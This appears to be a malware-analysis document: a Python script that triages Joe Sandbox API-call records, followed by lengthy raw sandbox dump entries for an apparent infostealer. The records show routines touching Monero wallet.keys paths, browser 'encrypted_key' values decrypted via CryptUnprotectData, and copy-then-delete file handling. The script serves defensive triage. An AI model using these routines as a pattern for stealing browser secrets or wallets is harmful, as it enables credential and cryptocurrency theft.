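SAM_BITS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
            0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
            0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL"}
# Assumption: roots a non-admin user can write to; a module loaded from here was not shipped by the OS.
WRITABLE_DIRS = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

# One report line: optional "Part of subcall function ADDR:", then API.MODULE(args), ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                # address of the call site in the dump
    subcall: Optional[int]  # callee address when the report lists the call under a subcall


def as_int(arg: str) -> Optional[int]:
    """The report prints known argument values as up to 8 hex digits; '?' means unknown."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def parse_record(text: str) -> List[Call]:
    """Parse the API lines of one function record; headers and dump listings are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_sam(mask: int) -> List[str]:
    """Expand a REGSAM access mask into named rights, collapsing the KEY_READ composite first."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in SAM_BITS.items():
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(hex(mask))  # bits this table does not name
    return names


def triage(calls: List[Call]) -> List[dict]:
    """Apply heuristic rules (author's assumptions) to one function's call list."""
    findings = []
    apis = [c.api for c in calls]
    opener = next((c for c in calls if c.api.startswith("RegOpenKeyEx")), None)
    if opener and any(a.startswith("RegQueryValueEx") for a in apis):
        hive = as_int(opener.args[0]) if opener.args else None
        sam = as_int(opener.args[3]) if len(opener.args) > 3 else None
        findings.append({"rule": "registry_value_read", "ref": opener.ref,
                         "hive": HIVES.get(hive, opener.args[0] if opener.args else "?"),
                         "access": decode_sam(sam) if sam is not None else []})
    for c in calls:
        if c.api.startswith("LoadLibrary") and c.args and c.args[0].lower().startswith(WRITABLE_DIRS):
            findings.append({"rule": "library_from_writable_dir", "ref": c.ref, "path": c.args[0]})
    if "CopyFileA" in apis and "DeleteFileA" in apis:
        findings.append({"rule": "file_copied_then_deleted",
                         "ref": [c.ref for c in calls if c.api in ("CopyFileA", "DeleteFileA")]})
    wallet_args = sorted({a for c in calls for a in c.args if "wallet" in a.lower()})
    if wallet_args:
        findings.append({"rule": "wallet_path_in_arguments", "strings": wallet_args})
    return findings


# Sample records copied from the function entries in this section of the report.
REGISTRY_RECORD = r"""
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827FC7
• RtlAllocateHeap.NTDLL(00000000), ref: 00827FCE
• RegOpenKeyExA.ADVAPI32(80000002,015EBB98,00000000,00020119,?), ref: 00827FEE
• RegQueryValueExA.ADVAPI32(?,015FD1D8,00000000,00000000,000000FF,000000FF), ref: 0082800F
• RegCloseKey.ADVAPI32(?), ref: 00828022
"""
LOADLIB_RECORD = r"""
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0081A098
"""
FILE_RECORD = r"""
  • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081AA11
• lstrlen.KERNEL32(00000000,00000000), ref: 0081AB2F
• DeleteFileA.KERNEL32(00000000), ref: 0081AE73
"""

if __name__ == "__main__":
    for name, rec in (("registry", REGISTRY_RECORD), ("loadlib", LOADLIB_RECORD), ("file", FILE_RECORD)):
        for finding in triage(parse_record(rec)):
            print(name, finding)
```

Run against the registry record, the script reports the open as `HKEY_LOCAL_MACHINE` with `KEY_READ | KEY_WOW64_64KEY`, which is what `80000002` and `00020119` encode; the `LoadLibraryA` record is flagged because the module path sits under `C:\ProgramData`, and the file record is flagged for the copy-then-delete pair and for the wallet path in a subcall argument. The heuristics only make the raw records easier to scan; they do not replace reading the disassembly.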
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081AA11
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0081AB2F
                              • lstrlen.KERNEL32(00000000), ref: 0081ADEC
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • DeleteFileA.KERNEL32(00000000), ref: 0081AE73
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c57e0535520ec6dbcb90d98a6ff293707b9d08751472fa5efda91153ccd7b90c
                              • Instruction ID: 59da40ab87bd05bdb321bbdcca5ee947e6d9211a69b71395d9a857b9d3e7b410
                              • Opcode Fuzzy Hash: c57e0535520ec6dbcb90d98a6ff293707b9d08751472fa5efda91153ccd7b90c
                              • Instruction Fuzzy Hash: 6AE1D6729101289BCB08EBA8EDA2EEE733DFF54310F508555F516B6191DF346A88CB63
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D581
                              • lstrlen.KERNEL32(00000000), ref: 0081D798
                              • lstrlen.KERNEL32(00000000), ref: 0081D7AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0081D82B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 0e931ebdf9d71b9c1342e69cf9abbe22240594cca9295a92a2afbfa55664977e
                              • Instruction ID: cea3b79c1b78f568f9147dd0a1389ccf5ec4ca993303e930caff4bcc834b5f57
                              • Opcode Fuzzy Hash: 0e931ebdf9d71b9c1342e69cf9abbe22240594cca9295a92a2afbfa55664977e
                              • Instruction Fuzzy Hash: AB91F6729101189BCB08EBA8EDA6EEE7339FF54310F504558F516F6191EF346A88CB63
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D901
                              • lstrlen.KERNEL32(00000000), ref: 0081DA9F
                              • lstrlen.KERNEL32(00000000), ref: 0081DAB3
                              • DeleteFileA.KERNEL32(00000000), ref: 0081DB32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: f45dc03ce4199b6c660db460710b1afd8e23bd1027bc63f2628a736cc6ff2fa1
                              • Instruction ID: 576520806967d390b85748eb129b5bcde7e715874f5f672e5f1d286125a8e3ac
                              • Opcode Fuzzy Hash: f45dc03ce4199b6c660db460710b1afd8e23bd1027bc63f2628a736cc6ff2fa1
                              • Instruction Fuzzy Hash: 3181D3729101249BCB08EBA8EDA6EEE7339FF54310F404558F516F6191EF346A89CB63
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction ID: d74b3289430c78f5a336a245d3d95c2c1e328bc66d08e841ccf2195a91dd8d6e
                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction Fuzzy Hash: 2851B272500606AFEF29AF58C841BBA77A4FF41314F28452DEB06D6692EF31ED40DB91
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 0081A664
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: @$v10$v20
                              • API String ID: 2746078483-278772428
                              • Opcode ID: 64274629c3fb1d32c546074b896cde2b1abf5bf8f941d298db6169fa81fa1751
                              • Instruction ID: 7bf8443ba894841cdb718673e962a6f8cc3bd9f5c36360e9496661afbae6eb5a
                              • Opcode Fuzzy Hash: 64274629c3fb1d32c546074b896cde2b1abf5bf8f941d298db6169fa81fa1751
                              • Instruction Fuzzy Hash: 87513E70A1021C9FDB18DFA8DD96BED777AFF40304F008518F90AAB291DB706A85CB52
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00831678,00830D93), ref: 0081F64C
                              • lstrlen.KERNEL32(00000000), ref: 0081F66B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 904b384facef8f671396cef3c9851f0e911fcab4ff19132ab386b0b856734221
                              • Instruction ID: a3f375c1dd20582e34f4aa138e2b2ed113c5d4ad423737b6098f15b66b8df2cc
                              • Opcode Fuzzy Hash: 904b384facef8f671396cef3c9851f0e911fcab4ff19132ab386b0b856734221
                              • Instruction Fuzzy Hash: 8451C071D101189BCB08FBA8EDA6DED7379FF54310F408568F916A7191EE346A48CB63
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 63fe2859e16f4a21edcfa67134cc96cbcddefe1e3cfbc13849854c8a77146cff
                              • Instruction ID: 30f01c534b4923c7dfd15b2f430ed0511a455a22b20f7eae85fe75b764c86509
                              • Opcode Fuzzy Hash: 63fe2859e16f4a21edcfa67134cc96cbcddefe1e3cfbc13849854c8a77146cff
                              • Instruction Fuzzy Hash: 59411271D101199BCB08EFA4E865AEEB779FF54304F008418F516BA290EB759A85CF92
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0081A489
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                                • Part of subcall function 0081A210: LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                                • Part of subcall function 0081A210: LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                                • Part of subcall function 0081A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0081A2D4
                                • Part of subcall function 0081A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0081A2F3
                                • Part of subcall function 0081A2B0: LocalFree.KERNEL32(?), ref: 0081A323
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
